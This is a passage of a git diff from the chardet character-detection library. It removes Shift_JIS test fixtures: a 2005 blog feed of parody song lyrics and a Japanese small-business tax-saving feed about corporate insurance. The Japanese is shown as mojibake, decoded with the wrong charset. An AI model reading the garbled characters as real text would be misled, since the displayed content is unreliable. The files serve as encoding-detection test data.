    u^’‚ּ‚₪‚½v‚©‚חV‚½‚ֹ‚‚ס‚ָ‚ֵ‚₪‚½‚¨‚₪‚ּƒR[ƒi[‚ֹ“oךB
    -ף±‚ּ‚½‚‚ֹƒAƒp[ƒg‚ֹ—ˆ‚ִ‚¢‚י‚ח‚µ‚¢B
    -‚ ‚¾–¼‚ֽu‚ׂ[‚¿‚ב‚סv -

    -
    - -
    ]]>
    -sakusakuintro -silknet -2005-11-24T13:25:23+09:00 -
    - -F’J‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0511/022229.php - -
    -

    F’J‚ּ‚₪‚½

    - -

    •ת‘—“תF05/11/2
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    rלRIVER
    -r‚װ‚יRIVER
    -r‚װ‚ך‰´I
    -r‚װ‚ךI

    - -

    ‚±‚±‚ֽF’J
    -FVALLEY
    -uFv‘־u‰´v...‰i‰“‚ּם‚¢

    - -

    ‹´‚ּ‰÷‚ֹF ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!! (FIHGT!FIGHT!)
    -‹´‚ּד‚ֹ‚אF ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!! (FIHGT!FIGHT!)
    -‰w‘O‚ּ•¡‡{
    -‰f‰ז‚גƒVƒ‡ƒbƒsƒ“ƒOƒ‚[ƒ‹‚ֹ‚א
    -F... ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!!

    - -

    I vs. F It's Destiny...
    -I vs. F It's Destiny...

    - -


    -‹C‰·ד¸..
    -ƒTƒ}[ƒ^ƒCƒ€
    -”M‚­‚ָ‚ךA‰´...
    -”M‚­‚ָ‚ך‚ֱI

    - -

    ‚±‚±‚ֽF’J
    -FVALLEY
    -uFv‘־u‰´v...‰i‰“‚ּם‚¢

    - -

    ‚₪‚¿‚םױ‚ט‚ֹ‚אF...ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!!(FIHGT!FIGHT!)
    -ƒƒbƒeƒƒA‚ֹ‚אF...ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!!(FIHGT!FIGHT!)
    -ƒ[ƒ^ƒ[...ƒ^ƒNƒV[Aƒ^ƒNƒV[I
    -’¼ְצ‚ּ“ּׂד‚ֹ‚אAF...ƒLƒ^„ׄׄ×(ֽ)„ׄׄ×!!!!

    - -

    I vs. F It's Destiny...
    -I vs. F It's Destiny...

    - -

    I vs. F
    -I vs. F

    - -
    -]]>
    -letssing -silknet -2005-11-02T22:29:07+09:00 -
    - -‘—§...ƒuƒ[ƒNƒ“ƒn[ƒg -http://www.sakusaku-silk.net/archives/0511/011034.php - -
    -

    ‘—§...ƒuƒ[ƒNƒ“ƒn[ƒg

    - -

    •ת‘—“תF05/11/1
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ‚ ‚ָ‚½‚ֶ‚¢‚י‚ֶy‚µ‚¢‚¯‚ך‚ַ
    -‚½‚¾‚»‚ך‚¾‚¯...
    -‚ ‚ָ‚½‚ֽA‚ֶ‚ִ‚א–”’‚¢‚¯‚ך‚ַ
    -‚½‚¾‚»‚ך‚¾‚¯...

    - -

    y‚µ‚­‚ִ‰½‚ׂ¢‚¯‚ָ‚¢‚ס‚ֵ‚·‚©H
    -‰´‚ֽ‚ג‚ֱ‚ֿװˆב‚ֱ‚ִ‚¢‚‚·‚©H
    -‚ ‚ָ‚½‚בוD‚«‚¾‚ֱ‚½‚©‚ח...
    -‰´‚ֹo—ˆ‚י1”װ‚ּƒRƒg‚נ...
    -‘Sg‘S—ל‚נ‚א‚ֱ‚ִ‚µ‚½‚¾‚¯‚ָ‚ס‚¾
    -‰´‚ּƒAƒCƒfƒ“ƒeƒBƒeƒB•צ‰ף...
    -‰´‚ֽ—צ‚ּ–ְ‚¢¢...

    - -

    ƒIƒH... ‰´... Don't Cry
    -‘O‚נ‚¯ חד‚°‚כ ƒtƒH[ƒGƒ”ƒ@[‰´...
    -‘—§‰w‚ּ‚ֶ‚ֱׂ‚½‰®×‚×...
    -‰´‚ּ‹¹‚ֹ“ֻ‚«h‚³‚י...
    -‘—§‰w‚ּ‚ֶ‚ֱׂ‚½‰®×‚×...
    -‹¹‚ֹ[‚­“ֻ‚«h‚³‚י...

    - -


    -¡“ת‚ֽy‚µ‚©‚ֱ‚½...‚ֱ‚ִ־‚ֱ‚ִ‚½‚ּ‚א
    -‘S•”A–²...H@–²ƒIƒ`‚©‚זH
    -‚½‚µ‚©‚ֹA‚ ‚ָ‚½‚ֶˆך‚ֹ‚¢‚ִ‚א...
    -־‚¢ֵ—Dז•ƒlƒ^’T‚µ

    - -

    ‚ֵ‚אA‚ ‚ָ‚½‚בוD‚«‚¾‚ֱ‚½‚©‚ח...
    -•ֿ‚ם‚כ‚₪‚ֶ‚µ‚½A©•ׂנ”’ט‚µ‚ִ‚ֵ‚א
    -•ֿ‚ם‚כ‚₪‚ֶ‚µ‚½... װˆב‚ֱ‚ִ‚‚·‚©H
    -•ֿ‚ם‚ֱ‚ִ‚‚ִ‰‚‚ִ‚ם‚©‚ֱ‚½...
    -‚ג‚ֱ‚ֿ‰´‚ֽ‚÷‚ס‚÷‚ס װˆב‚ֱ‚ִ‚ֻ‚¥[‚ֱI
    -‹C‚ֲׂ‚¢‚½‚ז ‰´‚ֽ‰´‚ָ‚ס‚¾...
    -‰´‚ֵ‚µ‚©‚ָ‚¢‚ס‚¾
    -_—l‚׉´‚ֹ‚­‚ך‚½—§‚¿ˆ’u‚ָ‚ס‚¾
    -‚»‚₪A¶‚«—l‚ָ‚ס‚¾
    -‰´‚ּƒAƒCƒfƒ“ƒeƒBƒeƒBAƒJƒ€ƒoƒbƒNI
    -‰´‚ֽ‰H‰»‚µ‚½ƒIƒIƒ€ƒ‰ƒTƒL(“ֱ•“V‘R‹L”O•¨)

    - -

    ƒIƒH... ‰´... Don't Cry
    -‘O‚נ‚¯ חד‚°‚כ ƒtƒH[ƒGƒ”ƒ@[‰´...
    -‚ ‚ט‚ֶׂ‚₪...‚ ‚ָ‚½...
    -‚ ‚ּ¸—צ‚ּ‚¨‚©‚°‚ֵ
    -‰´‚ֽ‰´‚ֶ‚¢‚₪lװ‚ׂם‚©‚ֱ‚½
    -‚ ‚ּ“תA‚ ‚ּ...‘—§‚ֵ
    -‰´‚ֽ©•ׂנ©‚ֲ‚¯‚½‚ס‚¾...
    -‘—§‰w‚ּ‚ֶ‚ֱׂ‚½‰®×‚×...
    -‘—§‰w‚ּ‚ֶ‚ֱׂ‚½‰®×‚×...

    - -

    ‘—§... ƒuƒ[ƒNƒ“ƒn[ƒg...ƒXƒg[ƒ[...

    - -
    -]]>
    -letssing -silknet -2005-11-01T10:34:35+09:00 -
    - -C’ך‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0511/011009.php - -
    -

    C’ך‚ּ‚₪‚½

    - -

    •ת‘—“תF05/10/31
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg with@–״‘÷ƒJƒGƒ‰&DA•ִ

    - -
    -
    - -

    —‚¿‚י—\’ט‚¾‚ֱ‚½‚ּ‚©H(DAE•ִ)
    -ֵ‰‚©‚ח‘_‚ֱ‚ִ‚½‚ּHל‚ֱ‚½‚ֱ‚ִƒRƒg‚ֽ...(ƒJƒGƒ‰)
    -‚¿‚ׂ₪ƒˆ...(ƒ”ƒBƒ“ƒZƒ“ƒg)

    - -


    -uצ…ֽ‚ֽ‰©F‚ֹ‚©‚¬‚יIv‚ֶ ƒr[ƒgƒ‹ƒY‚×¾‚ֱ‚ִ‚¢‚½...
    -uצ…ֽ‚ֽ‰©F‚ֹ‚©‚¬‚יIv‚ֶ ‹א‘ע–¾q‚א¾‚ֱ‚ִ‚¢‚½...
    -Come on!

    - -

    (‰©F‚ֹ‚©‚¬‚יI‰©F‚ֹ‚©‚¬‚יI)
    -‚ם‚‚ [[[[[
    -(‰©F‚ֹ‚©‚¬‚יI‰©F‚ֹ‚©‚¬‚יI)
    -‚ם‚‚ ‚ [[@‚¢‚¦[[[‚¢

    - -

    C’ך‚ײs‚±‚₪ ‚¨•ף‚ֽu‚»‚±v‚ֹ‚ ‚י...
    -C’ך‚ײs‚±‚₪ ‚¨•ף‚ֽu’ךv‚ֹ‚ ‚י...

    - -
    -]]>
    -letssing -silknet -2005-11-01T10:09:49+09:00 -
    - -¼“‹‚ּ‚₪‚½ -http://www.sakusaku-silk.net/archives/0510/242320.php - -
    -

    ¼“‹‚ּ‚₪‚½

    - -

    •ת‘—“תF05/10/20
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    “c–³ƒ^ƒ[‚נ–ˆף‚ֹ ’‚¢‚ָ‚ך‚½“¹‚נ‹A‘מ
    -–l‚ּTiny Memory...
    -–k´‚ּM†‹ָ‚ֱׂ‚ִ...‚ַ‚±‚ײ“‚י‚ֶ“¥״‚נ...
    -’‚ח‚¸‚ֹ‚·‚‚©... ‚ם‚©‚ט‡‚¦‚ָ‚©‚ֱ‚½
    -‚ֻ‚¥...H ‚ַ‚ך‚‚ַ‚ּ‚×—¬‚ך‚½‚¾‚כ‚₪H
    -¼•‚ּ“c–³‰w‚ֹ1”װ‹‚¢ך‚ֵ...
    -‚±‚±‚ׂ‰ֻ‚©’n‰÷“¹‚ֹ‚ָ‚ֱ‚ִ‚­‚ך‚½‚ח
    -‚א‚₪‰½‚א•|‚­‚ָ‚¢...
    -‚»‚ּˆ₪‚ׂ ‚ך‚־‚¢‚¢...Woo...

    - -

    “c–³••’J...X‚ּƒCƒmƒZƒ“ƒXiˆ׃–¡•s–¾j
    -o‰ן‚ֱ‚½“ת‚ּ‹ף‚נ –l‚ֽ–Y‚ך‚ָ‚¢‚ֵ‚¢‚י
    -¼“‹s...
    -Vֲ”~X“¹... •‘ ‹«’‚ט... ‘עX“¹...
    -‚»‚ך‚¼‚ך‚ּנ·“_

    - -

    ƒoƒ“ƒhƒu[ƒ€‚ׂג‚ֱ‚ִ‚«‚½
    -‚‚ס‚ָƒMƒ^[‚גƒx[ƒX‚נ‚ֱ‚ִ...
    -–l‚ּTiny Memory
    -‚׀‚־‚ט‚׋u‚ּ‰ּ‚ׂ ‚ֱ‚½
    -ƒWƒ…ƒ“ƒXƒJ‚ּפƒƒbƒcƒS[! ƒqƒoƒƒqƒ‹ƒY
    -‚׀‚־‚ט‚׋u‚ֹs‚±‚₪‚ֶ‚µ‚ִ‚א...
    -‚ֻ‚¥...H ‚ַ‚ך‚‚ַ‚ּ‚×—¬‚ך‚½‚¾‚כ‚₪H
    -‚‚½...“c–³‰w‚ֹ1”װ‹‚¢ך‚ֵ...
    -µ‚ך‚ָ‚¢X‚ּ“ֽ‚©‚–²‚ֹ
    -—E‹C‚נ‚­‚ך‚½‚ּ‚ֽ
    -i•‘ ‹«’‚ט‚©‚חj1–{‚±‚₪‚ּ’n‰÷“¹‚ֵ‚µ‚½

    - -

    “c–³••’J...X‚ּƒCƒmƒZƒ“ƒXiˆ׃–¡•s–¾j
    -o‰ן‚ֱ‚½“ת‚ּ‹ף‚נ –l‚ֽ–Y‚ך‚ָ‚¢‚ֵ‚¢‚י
    -¼“‹s...
    -Vֲ”~X“¹... •‘ ‹«’‚ט... ‘עX“¹...
    -‚»‚ך‚¼‚ך‚ּנ·“_

    - -

    ¼“‹s...
    -¼“‹s...
    -¼“‹s...
    -¼“‹s...

    - -
    - - -

    ‚f‚k‚`‚x•—I

    ]]>
    -letssing -silknet -2005-10-24T23:20:42+09:00 -
    - -לט‚ּ— ƒ”ƒ@[ƒWƒ‡ƒ“ƒAƒbƒvver -http://www.sakusaku-silk.net/archives/0510/200152.php - -
    -

    לט‚ּ— ƒ”ƒ@[ƒWƒ‡ƒ“ƒAƒbƒvver

    - -

    •ת‘—“תF05/10/19
    -/‹ָF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg
    -•ׂ‹ָ‰‰‘tFƒCƒ“ƒrƒWƒuƒ‹Eƒtƒ@ƒ~ƒ[
    -‰ּF”’ˆהƒ”ƒBƒ“ƒZƒ“ƒg

    - -
    -
    - -

    ‚ ‚½‚µ...לט‚ֵ¶‚‚ךˆח‚ֱ‚½‚ּ...
    -‚ ‚½‚µ...לט‚נ—£‚ך‚ח‚ך‚ָ‚¢‚ּ...
    -“s–¯‚¶‚ב‚ָ‚¢...ƒnƒ}‚ֱq‚ֵ‚א‚ָ‚¢...
    -‚ ‚½‚µ...‚ ‚½‚µ‚ֽלט‚ּ—

    - -

    ¡“x—ˆ‚ִ‚ֻ...‚ ‚ּל’´‚¦‚ִ...
    -‘½–€ל‰z‚¦‚ִA‰ן‚¢‚ֹ—ˆ‚ִ‚ֻ...
    -‚ם‚½‚µA‚¿‚ו‚ֱ‚ׂ‚טƒLƒƒC‚ֹ‚ָ‚ֱ‚½‚©‚אH
    -‚ ‚ָ‚½‚ּ‚½‚‚ֹƒLƒƒC‚ֹ‚ָ‚ֱ‚½‚©‚אH
    -לט‚©A‚ ‚ָ‚½‚©H‚ַ‚ֱ‚¿‚×D‚«H‚ָ‚ס‚ִ...
    -ˆ‚‚ח‚ך‚ָ‚¢A‚¢‚ג‚¾‚ם...
    -ˆ׃’nˆ«‚ֻ...‚»‚ס‚ָƒRƒg•·‚­‚ָ‚ס‚ִ...
    -‚א‚¿‚כ‚סA‚ ‚ָ‚½...‚ ‚ָ‚½...‚ ‚ָ‚½‚א‘וD‚«...

    - -

    ‚ ‚...לט@044
    -Ciao! לט@044
    -ל‚ּז‚ֱ‚¿‚ולט‚ֽ...
    -ז’[ ֵז’[ _“ל‚ֵּ‘O

    - -

    לט‰w‘O‚א...ƒ`ƒbƒ^‚א...₪“XX‚א...
    -לט‹…ך ‘ו—m‚ּv‚¢o‚א...
    -“™X—ֽ‹£‹Zך‚אƒtƒƒ“ƒ^[ƒ‚א...
    -לט‹£”n‚ּ–¼–ִuƒƒW[ƒ^v...
    -uƒSƒ€’‚טv‚ֹ’‚¶‚י“¹‚א...’©‚א...
    -ג‘־“ַ‚‚ָ‚¢u”×’“כv...
    -¡‚ֽ‚א‚₪v‚¢o...ƒ–‹u—V‰€...
    -‚÷‚ס‚װA‚‚ֶ‚‚ִ...@We are KAWASAKI!
    -‚‚ס‚ָ ‚‚ס‚ָ ‚‚ס‚ָ ‘וD‚«...

    - -

    ‚ ‚...לט@044
    -Ciao!@לט@044
    -ל‚ּז‚ֱ‚¿‚ולט‚ֽ...
    -ז’[ ֵז’[ _“ל‚ֵּ‘O

    - -

    ‚ ‚...לט@044
    -Ciao!@לט@044
    -“s–¯‚¶‚ב‚ָ‚¢...ƒnƒ}‚ֱq‚ֵ‚א‚ָ‚¢...
    -‚ ‚½‚µ...‚ ‚½‚µ‚ֽלט‚ּ—

    - -
    -]]>
    -letssing -silknet -2005-10-20T01:52:25+09:00 -
    - - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/setsuzei119.jp.xml b/chardet/tests/SHIFT_JIS/setsuzei119.jp.xml deleted file mode 100644 index b718fad..0000000 --- a/chardet/tests/SHIFT_JIS/setsuzei119.jp.xml +++ /dev/null @@ -1,949 +0,0 @@ - - - -’†¬י‹ֶo‰cׂ‚ּ‚½‚‚ֵּ‚P‚P‚X”װ - -2005-10-13T01:18:27Z -’†¬י‹ֶo‰cׂ‚ּ‚½‚‚ֵּp‚ֶא–±ם—× -tag:setsuzei119.jp,2005://1 -Movable Type -Copyright (c) 2005, b-admin - -ֵ‘־פ‚נ–‘S‚ֹ‚·‚י•¯ - -2005-10-13T01:18:27Z -2005-10-13T00:52:02Z -tag:setsuzei119.jp,2005://1.171 -2005-10-13T00:52:02Z -u’‘’טת•¯v‚ֶu’·תQ•¯v‚נˆ—p‚·‚י‚±‚ֶ‚ֵAר—¦‚ז‚­–נˆץ‘E‹א‚נƒXƒgƒbƒN‚ֵ‚«‚‚·B - -b-admin - - - -¶–½•¯ - -o‰cׂ‚ֶ‚µ‚ִ‚ּ‚ ‚ָ‚½‚ֽA”NװA‚ַ‚ך‚­‚ח‚¢‚ּ‹‹—¿‚נף‚¯ז‚ֱ‚ִ‚¢‚י‚ֵ‚µ‚ו‚₪‚©B
    -z–‚ּ‹אz‚א‹C‚ֹ‚ָ‚י‚ֶ‚±‚כ‚¾‚×A–{“–‚ֹd—v‚ָ‚ּ‚ֽAֵˆר‚«ד‚ֹ‚ַ‚ך‚¾‚¯c‚י‚©‚ֵ‚·B

    - -

    —ב‚¦‚־”N1000–‰~‚ֵƒVƒ~ƒ…ƒ[ƒVƒ‡ƒ“‚·‚י‚ֶA“¾ֵEZ–¯ֵA‚»‚µ‚ִ׀‰ן•¯—¿‚נ•‰’S‚·‚י‚ֶAט³‚ֹc‚י»‹א‚ֽ761–‰~‚ֶ‚ָ‚ט‚‚·Bטז‚ט—¦‚ֵ‚ֽ–ס76.1“‚ֵ‚·B

    - -

    “ת–{‚ֵּ§‚ֵ‚ֽA—i‰ֵ‚ֵֵ‹א‚׉‚¹‚ח‚ך‚י‚ּ‚ֵA‹‹—¿‚ב‚¦‚ך‚־טז‚ט—¦‚׉÷‚ֱׂ‚ִ‚¢‚­‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B”N‚×2000–‰~‚ֹ‚ָ‚י‚ֶAֵ‹א“™‚ּ•‰’S‚×622–‰~‚ֶ‚ָ‚טAטז‚ט—¦‚ֽ67“‚ֹ‰÷‚ֱׂ‚ִ‚µ‚‚¢‚‚·B

    - -

    “ת–{‚ּ“¾ֵEZ–¯ֵ‚ֵּ‚ֵ—¦‚ֽ50“A–@l‚ֹ‰‚¹‚ח‚ך‚יֵ‹א‚ֵּ‚ֵ—¦‚ֽ44.8“‚ֵA‚±‚ך‚ֽu¢Eˆך‰“‚ֵָ§ֲ‹«v‚ֶ‚א¾‚¦‚י‚ֵ‚µ‚ו‚₪B

    - -

    ‚א‚µֵ‚ּ‚½‚‚ֹ‰½‚אט‚נ‘ֵ‚½‚ָ‚¯‚ך‚־A‰ן׀‚ֹ‚אֲl‚ֹ‚אƒLƒƒƒbƒVƒ…‚נc‚·‚±‚ֶ‚ֽ”סם‚ֹ“ן‚µ‚¢‚ז‚₪‚ֹ©‚¦‚‚·B‚µ‚©‚µֵ‘־פ‚ֹ‚ז‚טֵ—¦‚נ—}‚¦‚י•–@‚ׂ ‚י‚ּ‚ֵ‚·B

    ]]> -‚»‚ך‚ֽA‚z‰ֵ‚³‚ך‚י‹‹—^‚ֶ‚µ‚ִ‚ֵ‚ֽ‚ָ‚­Aֵ§“I‚ֹ—D‹צ‚³‚ך‚ִ‚¢‚יu‘E‹אv‚ֶ‚µ‚ִף‚¯ז‚י‚±‚ֶ‚ֵ‚·B
    -‚·‚ָ‚ם‚¿A‰ן׀‚ּ—˜‰v‚נ‹‹—^‚ֹׂ³‚·‚י‚ּ‚ֵ‚ֽ‚ָ‚­A‘E‹א‚ֶ‚µ‚ִֿ‚—§‚ִ‚י‚ֵ‚·B

    - -

    —ב‚¦‚־A”N1000–‰~‚נ1500–‰~‚ֹƒAƒbƒv‚³‚¹‚י‚©‚ם‚ט‚ֹA500–‰~‚נ20”Nװֿ‚—§‚ִ‚ִA20”Nד‚ֹ‚P‰­‰~‚נ‘E‹א‚ֶ‚µ‚ִז“¾‚µ‚‚·B
    -‚»‚₪‚·‚י‚±‚ֶ‚ֵAטז‚טz‚×2500–‰~‚‚ַ‚אˆב‚ֱ‚ִ‚«‚‚·B

    - -

    ‚»‚±‚ֵd—v‚ָ‚ּ‚ֽA‘E‹א‚נ‚ַ‚ּ‚ז‚₪‚ָ•–@‚ֵֿ‚—§‚ִ‚י‚©‚ֵ‚·B
    -‚»‚ך‚ֹ‚ֽA|‚¯‹א‚נ‘Szo”ן‚ֶ‚µ‚ִvד‚ֵ‚«‚יA‚ ‚ים‚ּ•¯‚נˆ—p‚·‚י•–@‚×’–‚³‚ך‚ִ‚¢‚‚·B

    - -

    ‚±‚ּ•¯‚נ‰נ–ס•װ–—¦‚ּ‚‚¢ת‚ֹ‚ ‚ם‚¹‚ִ‰נ–ס‚·‚י‚±‚ֶ‚ֵA‘¹‹א‚ֶ‚µ‚ִvד‚³‚ך‚½‹אz‚ּ‚X„ˆָד‚×–‚ֱ‚ִ‚­‚י‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B
    -‚µ‚©‚µְ‚ּ‚ֶ‚±‚כA‚»‚ּת‚ֶ‘E‚ׂ₪‚‚­d‚ָ‚ח‚ָ‚¢‚ֶƒƒƒbƒg‚נ‹ף‚ֵ‚«‚ָ‚¢‚±‚ֶ‚ֹ‚ָ‚ט‚‚·‚ּ‚ֵ’ˆ׃‚וK—v‚ֵ‚µ‚ו‚₪B

    - -

    ¡‰ס‚²׀‰מ‚·‚י‚ּ‚ֽA‚±‚ּ–ג‘ט‚נƒJƒo[‚·‚י•¯‚ּמ•ס‚ֵ‚·B‚µ‚­“¢‚µ‚ִ‚‚‚µ‚ו‚₪B

    - -


    -¦ֵ‘־פ‚נ–‘S‚ֹ‚·‚יV^•¯’a¶

    - -

    - -

    „ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×
    -¡¡¡
    -¡¡¡@@@ב‚¢o‰cׂ‚ֹ‚ֵֽ“K
    -¡¡¡
    -„ׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄׄ×

    - -

    5`10”N‚ּװ‚ֹ‰נ–ס•װ–—¦‚ּ‚‚³‚׃ƒƒbƒg‚ֹ‚ָ‚י‚ּ‚×Au’‘’טת•¯v‚ֵ‚·B
    -‚±‚ּƒƒƒbƒg‚נˆ‚©‚·‚ֹ‚ֽA5`10”N‚ּװ‚ֹ‘Eת‚×—ˆ‚י•K—v‚ׂ ‚ט‚‚·B10”N‚נ‰‚¬‚י‚ֶA•װ–—¦‚×’˜‚µ‚­‰÷‚ֱׂ‚ִ‚µ‚‚₪‚©‚ח‚ֵ‚·B

    - -

    ‚±‚ּu’‘’טת•¯v‚ֵ‚ֽA30`40‘ד‚ּב‚¢o‰cׂ‚ּ‘Eת‚×10”Nדˆָ~‚ֶ‚ָ‚טAg‚¦‚‚¹‚סB‰¼‚ֹ5`10”N‚ּװ‚ֵ‰נ–ס‚µ‚ִ‚אA‘E‹א‚ֶ‚µ‚ִף‚¯ז‚י‚±‚ֶ‚ֵׂ‚«‚ָ‚¢‚ּ‚ֵAֵ—¦‚ׂ©‚ָ‚ט‚‚­‚ָ‚ֱ‚ִ‚µ‚‚¢‚‚·B

    - -

    ‚±‚ּ–ג‘ט‚נƒJƒo[‚·‚יV‚µ‚¢•¯‚ֽu’·תQ•¯v‚ֶ‚¢‚₪•¯‚ֵ‚·B
    -u’‘’טת•¯v‚ּ‚ז‚₪‚ֹA•װ–—¦‚׉÷‚ׂי‚±‚ֶ‚ֽ‚ָ‚­A‰ֱ“”N”‚×’·‚­‚ָ‚ך‚־‚ָ‚י‚‚ַA•װ–—¦‚ׂ‚­‚ָ‚ֱ‚ִ‚¢‚«‚‚·Bֵ‘ו‚ֵ‚ֽ100“‚נ’´‚¦‚י‚±‚ֶ‚א‚ ‚י‚ּ‚ֵ‚·B

    - -

    ‚±‚ך‚חu’‘’טת•¯v‚ֶu’·תQ•¯v‚ּ‚ַ‚¿‚ח‚×—L—˜‚©‚ֽAo‰cׂ‚ּ‘E—\’טת‚ֹA‚ַ‚¿‚ח‚ּ•װ–—¦‚ׂ‚¢‚©‚ֵˆ‚‚י‚ֵ‚µ‚ו‚₪B
    -ב‚¢l‚ֽ’·תQ•¯v‚×—L—˜‚ָך‡‚ב½‚¢‚ֶv‚¢‚‚·B

    - -

    u’·תQ•¯v‚ּƒƒƒbƒg‚ֽA‘¼‚ֹ‚א‚ ‚ט‚‚·B
    -u’‘’טת•¯v‚ּך‡Aְ‚ֽ‰ֱ“f¸i’Nf’fj‚ׂ©‚ָ‚טµ‚µ‚¢‚ֵ‚·B
    -‚ֶ‚±‚כ‚×u’·תQ•¯v‚ֽ‰ֱ“‘O‚ּf¸‚וs—v‚ָ‚ּ‚ֵ‚·B

    - -

    u’·תQ•¯v‚ּ‰נ–ס•װ–—¦‚ֽAu’‘’טת•¯v‚ּƒs[ƒN‚ּ‚»‚ך‚ז‚ט‚א’ב‚¢‚ֵ‚·B
    -‚ֶ‚ֽ‚¢‚¦A—ב‚¦‚־‚X”N–‚ּ•װ–—¦‚ֽ83“‚ֵֶר‰‚נl‚¦‚י‚ֶ\•ֵׂA‹}‚ָo”ן‚ֵ‰נ–ס‚·‚י•K—v‚ֹ”—‚ח‚ך‚ִ‚אAƒƒXƒN‚נ—}‚¦‚י‚±‚ֶ‚ֵׂ‚«‚י‚ּ‚ֵ‚·B

    - -

    ‚³‚ח‚ֹAˆָ‰÷‚ּ‚ז‚₪‚ָƒƒƒbƒg‚א‚ ‚ט‚‚·B
    -@(1)_–סׂ‘•t‚ֵׂ‚«‚י
    -@@@i’™‚‚ֱ‚ִ‚¢‚י‰נ–ס‹א‚ּ90“‚®‚ח‚¢‚‚ֵˆר‚«o‚µ‰ֲ”\j
    -@(2)•¥ֿ‚ֵׂ‚«‚י
    -@@@i•¯—¿‚ּ•¥‚נƒXƒgƒbƒv‚µ‚ִ‚אA•ב‚ֽ‰÷‚ׂי‚וב‚ֽ‚ָ‚­‚ָ‚ח‚¸A
    -@@@•ב‚נp‘±‚ֵ‚«‚י§“xj
    -@(3)•¯‚ֹ¿ ’ט‚׉ֲ”\‚ָ‚ּ‚ֵ”N•¥‚¢‹אz‚נ״‚ט‚ִx•¥‚¢A
    -@@@ת––‚ֹˆך‡‚ֵ‘¹‹א‚ֶ‚µ‚ִ—‚ֶ‚¹‚יB

    - -

    ‚א‚¿‚כ‚סA–{—ˆ‚ּ•¯‚ּ–“I‚ֶ‚µ‚ִAˆך¶U•ב‚·‚י‚ֶ‚¢‚₪[ְ‚µ‚½‚א‚ּ‚ֶ‚ָ‚ֱ‚ִ‚¢‚‚·B

    - -

    ‚±‚ּu’·תQ•¯vA‚©‚ֲ‚ִ‚ֽˆךl“–‚½‚ט‚ּ•¯—¿‚×Aֵ‘ו‚ֵ‚א100–‰~–¢–‚ֵ‚µ‚½‚×A¡‚ֽo‰cׂˆךl‚ֵ‚א300–‰~A”z‹פׂ‚ֶ‡‚ם‚¹‚ך‚־500–‰~’צ“x‚ּ•¯—¿‚בg‚‚י‚ז‚₪‚ֹ‚ָ‚טA‚ׂ÷‚ס’–‚נW‚‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚·B

    - -

    ֵ‚אֵר‰‚ׂ‚­Aֵ‚א‘½‚­‚ּƒLƒƒƒbƒVƒ…‚נc‚¹‚י•–@‚ֶ‚µ‚ִ‚ֽA‚±‚ך‚ח‚Qם—‚ּ•¯‚נˆ—p‚·‚יˆָO‚ֹ‚ֽ‚ָ‚¢‚ֶ‚¢‚¦‚י‚ֵ‚µ‚ו‚₪B

    - -

    ©•ֹׂ‚ֽ‚ַ‚¿‚ח‚ּ•¯‚ּƒ^ƒCƒv‚דK‚µ‚ִ‚¢‚י‚©‚ֹ‚ֲ‚¢‚ִ‚ֽA”N—מ‚ג•¯תװA•¯‹אz“™‚ּנ‚ֹ‚ז‚ט•ֿ‚ם‚ט‚‚·B

    - -


    -‚µ‚¢‘—¿‚ֹ‚ֲ‚¢‚ִ‚ֽ
    -¦ֵ‘־פ‚נ–‘S‚ֹ‚·‚י•¯
    -@@¨ http://www.businessnetwork.co.jp/HTM/choki.html

    -‚נ‚²——‚­‚¾‚³‚¢B

    ]]> -
    -
    - -‰ן׀‚ֹƒLƒƒƒbƒVƒ…‚נc‚·‚½‚‚ּ‘‹אˆ—pם—× - -2005-09-08T04:43:28Z -2005-09-08T04:18:41Z -tag:setsuzei119.jp,2005://1.170 -2005-09-08T04:18:41Z -> u‘‹א‘־פƒxƒXƒgƒvƒ‰ƒ“v‚נ‚¨ט³‚ֹ @¨‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B ‚ ‚ָ‚½‚ּ‰ן׀‚ּˆZ‚ֽ‰½‚ֵ‚·‚©H ‚¦‚ֱA‚X‚׈... - -b-admin - - - -ˆZ‘־פ - -<< ‘‹אˆ—p‚ּ’ס¾I>> u‘‹א‘־פƒxƒXƒgƒvƒ‰ƒ“v‚נ‚¨ט³‚ֹ
    -@¨‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    ‚ ‚ָ‚½‚ּ‰ן׀‚ּˆZ‚ֽ‰½‚ֵ‚·‚©H
    -‚¦‚ֱA‚X‚׈ZcB‚»‚ך‚ֽ‘ו•ֿ‚ֵ‚·‚ֻB
